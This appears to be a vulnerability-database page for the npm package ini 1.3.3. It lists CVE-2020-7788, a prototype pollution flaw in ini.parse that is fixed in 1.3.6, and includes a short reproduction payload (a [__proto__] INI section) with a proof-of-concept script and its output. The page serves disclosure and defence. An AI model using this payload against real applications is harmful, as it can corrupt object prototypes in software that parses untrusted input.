Search for packages
| purl | pkg:npm/ini@1.3.3 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-7tyw-ppyt-zqgr
Aliases: CVE-2020-7788 GHSA-qqgx-2p2h-9c37 |
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse ### Overview The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability. If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context. ### Patches This has been patched in 1.3.6. ### Steps to reproduce payload.ini ``` [__proto__] polluted = "polluted" ``` poc.js: ``` var fs = require('fs') var ini = require('ini') var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.__proto__) console.log(polluted) ``` ``` > node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted ``` |
Affected by 0 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||
| Date | Actor | Action | Vulnerability | Source | VulnerableCode Version |
|---|---|---|---|---|---|
| 2026-04-16T21:15:03.641427+00:00 | GitLab Importer | Affected by | VCID-7tyw-ppyt-zqgr | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/ini/CVE-2020-7788.yml | 38.4.0 |
| 2026-04-11T22:27:11.738650+00:00 | GitLab Importer | Affected by | VCID-7tyw-ppyt-zqgr | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/ini/CVE-2020-7788.yml | 38.3.0 |
| 2026-04-02T22:38:53.512441+00:00 | GitLab Importer | Affected by | VCID-7tyw-ppyt-zqgr | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/ini/CVE-2020-7788.yml | 38.1.0 |
| 2026-04-01T16:56:17.965477+00:00 | GitLab Importer | Affected by | VCID-7tyw-ppyt-zqgr | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/ini/CVE-2020-7788.yml | 38.0.0 |